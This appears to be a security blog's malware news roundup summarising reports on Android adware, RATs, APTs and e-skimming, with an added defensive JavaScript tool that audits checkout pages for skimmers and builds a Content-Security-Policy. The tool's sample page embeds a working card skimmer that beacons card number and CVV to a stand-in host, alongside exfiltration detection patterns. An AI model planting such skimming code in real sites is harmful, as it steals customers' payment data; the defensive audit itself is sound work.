Android malware and adware, along with mobile espionage, made headlines during the last two weeks. There is no shortage of variety in malicious behavior: there are also articles about several RATs and APTs with current activity.

For more articles, check out our #onpatrol4malware blog.

Tracking down the developer of Android adware affecting millions of users

Source: welivesecurity

ESET researchers discovered a year-long adware campaign on Google Play and tracked down its operator. The apps involved, installed eight million times, use several tricks for stealth and persistence. Read more.

E-SKIMMING: Skimming Online Customer Payment Data From Website Checkout Forms

Source: niccs.us-cert.gov

Cybercriminals introduce skimming code into e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control. Read more.
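The advisory describes the mechanics but not how to check a page for them. As an added example (this is not code from the NICCS advisory or from any vendor), the script below does a static audit of a checkout page's `<script>` blocks for the two things a skimmer needs, access to the card fields and a way to push data to a host the shop does not control, and then builds the Content-Security-Policy that would have blocked that outbound request. The page HTML, the hostnames (`shop.example`, `cdn.shop.example`, `analytics-helper.example`, `stats-collect.example`) and the skimmer snippet are all constructed for this example.

```javascript
// Added example, not taken from the advisory: static audit of a checkout page
// for e-skimming indicators, plus the CSP that blocks the exfiltration.
// Every hostname and the skimmer snippet below are constructed for the demo.

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR = /\bsrc\s*=\s*["']([^"']+)["']/i;
const URL_IN_CODE = /https?:\/\/[a-z0-9.-]+(?::\d+)?/gi;

// Field names a skimmer has to read for the stolen data to be worth anything.
const PAYMENT_FIELDS = /card[-_ ]?number|ccnum|cvv|cvc|expir|cardholder|security[-_ ]?code/i;
// Browser APIs that can push data off the page (fetch/XHR, beacons, image pings, sockets).
const EXFIL_APIS = /\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(|\.src\s*=|WebSocket\s*\(/;

// Resolve a script src or embedded URL against the page URL and return its host.
function hostOf(url, base) {
  try { return new URL(url, base).hostname.toLowerCase(); } catch { return null; }
}

// Audit the page. `allowedHosts` is the allowlist of hosts permitted to serve
// scripts to this page or to receive data from it; the page's own host is
// always allowed so that relative script paths do not trigger findings.
function auditCheckoutPage(html, pageUrl, allowedHosts) {
  const allowed = new Set([hostOf(pageUrl, pageUrl), ...allowedHosts.map(h => h.toLowerCase())]);
  const findings = [];
  let index = 0;
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const [, attrs, body] = m;
    index += 1;
    const src = attrs.match(SRC_ATTR);
    if (src) {
      // External script (absolute or protocol-relative) from a host not on the allowlist.
      const host = hostOf(src[1], pageUrl);
      if (host && !allowed.has(host)) {
        findings.push({ script: index, kind: 'unexpected-third-party-script', host });
      }
      continue;
    }
    const touchesPayment = PAYMENT_FIELDS.test(body);
    const canExfil = EXFIL_APIS.test(body);
    const foreignHosts = [...new Set(
      (body.match(URL_IN_CODE) || []).map(u => hostOf(u, pageUrl)).filter(h => h && !allowed.has(h))
    )];
    if (touchesPayment && canExfil && foreignHosts.length) {
      findings.push({ script: index, kind: 'inline-skimmer-pattern', hosts: foreignHosts });
    } else if (touchesPayment && canExfil) {
      // Reads card fields and sends somewhere, but the destination is built at
      // runtime or is on the allowlist: still worth a manual look.
      findings.push({ script: index, kind: 'inline-script-reads-payment-fields-and-sends', hosts: [] });
    }
  }
  return findings;
}

// The policy that turns the finding into a blocked request: scripts only from
// the allowlist, and data may only leave the page towards the allowlist.
function checkoutCsp(allowedHosts) {
  const hosts = allowedHosts.map(h => `https://${h}`).join(' ');
  return [
    `default-src 'self'`,
    `script-src 'self' ${hosts}`,
    `connect-src 'self' ${hosts}`,   // fetch / XHR / sendBeacon / WebSocket
    `img-src 'self' ${hosts}`,       // the new Image().src beacon trick
    `form-action 'self' ${hosts}`,   // form hijacked to post elsewhere
    `frame-src 'self' ${hosts}`,
  ].join('; ');
}

// Constructed checkout page: two legitimate scripts, one unexpected third-party
// script, and an inline skimmer of the kind the advisory describes.
const SAMPLE_CHECKOUT_HTML = `
<form id="checkout" action="/pay" method="post">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="/static/app.js"></script>
<script src="//analytics-helper.example/a.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = { n: document.querySelector('[name=cardNumber]').value,
              c: document.querySelector('[name=cvv]').value };
    new Image().src = 'https://stats-collect.example/p.gif?d=' + btoa(JSON.stringify(d));
  });
</script>
`;

const findings = auditCheckoutPage(SAMPLE_CHECKOUT_HTML, 'https://shop.example/checkout', ['cdn.shop.example']);
console.log(JSON.stringify(findings, null, 2));
console.log('Content-Security-Policy: ' + checkoutCsp(['cdn.shop.example']));
```

Run it with `node` on a saved copy of a checkout page to get the two findings for the sample (the unexpected third-party script and the inline skimmer beaconing to `stats-collect.example`). The regex audit is a quick triage, not a parser; a skimmer that assembles its destination at runtime shows up only as the weaker "reads payment fields and sends" finding, which is why the CSP is the control that actually matters: it blocks the outbound request to any host not on the allowlist however the script got onto the page. Note that the policy shown has no `'unsafe-inline'`, so every inline script, including the shop's own, would need a nonce or hash before it is deployed.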

A Deep-Dive Analysis of the NukeSped RATs

Source: Fortinet

Advanced Persistent Threat (APT) groups pose a great threat to global security, especially groups associated with nation states. Read more.

SWEED Targeting Precision Engineering Companies in Italy

Source: marcoramilli

The attacker pretended to be a customer and sent the victim a well-crafted email containing a Microsoft XLS file that included real spare-part codes, quantities and shipping addresses. The attack scheme is very similar to the MartyMcFly campaign. Read more.

Hackers are using a bug in PHP7 to remotely hijack web servers

Source: The Next Web

The PHP programming language underpins much of the Internet. It forms the basis of popular content management systems like WordPress and Drupal, as well as more sophisticated web applications, like Facebook (kinda). Read more.

New cyberattacks targeting sporting and anti-doping organizations

Source: Microsoft

Today we’re sharing that the Microsoft Threat Intelligence Center has recently tracked significant cyberattacks originating from a group we call Strontium, also known as Fancy Bear/APT28, targeting anti-doping authorities and sporting organizations around the world. Read more.

Hiding in Plain Sight: New Adwind jRAT Variant Uses Normal Java Commands to Mask its Behavior

Source: Menlo Security

Street magicians have a secret: If you want to hide something, hide it in plain sight. Unfortunately, malicious actors are learning how to use the same concept to sneak malware past traditional cybersecurity tools and onto users’ computers. Read more.

Xhelper: Persistent Android Dropper App Infects 45K Devices in Past 6 Months

Source: Symantec

Symantec has observed a surge in detections for a malicious Android application that can hide itself from users, download additional malicious apps, and display advertisements. Read more.

The commoditization of mobile espionage software

Source: Talos

The creators of these types of apps can track users' locations and see their social media usage, and they certainly open the door to abuse by governments hoping to spy on their citizens, parents looking to track their children, or controlling spouses hoping to track every move their partners make. Read more.

Deepfakes: When seeing isn’t believing

Source: welivesecurity

Deepfakes are rapidly becoming easier and quicker to create and they’re opening a door into a new form of cybercrime. Read more.

Malware Analysis Report (AR19-304A)
MAR-10135536-8 – North Korean Trojan: HOPLIGHT

Source: CISA

Working with U.S. Government partners, DHS, FBI, and DoD identified Trojan malware variants used by the North Korean government. This malware variant has been identified as HOPLIGHT. Read more.

QSnatch – Malware designed for QNAP NAS devices

Source: Traficom

This article examines a malware family dissected by NCSC-FI specialists. The malware is designed specifically for QNAP NAS (Network Attached Storage) devices and is capable of various malicious activities on an infected device. Read more.

DarkUniverse – the mysterious APT framework #27

Source: Kaspersky SecureList

In April 2017, ShadowBrokers published their well-known ‘Lost in Translation’ leak, which, among other things, contained an interesting script that checked for traces of other APTs in the compromised system. Read more.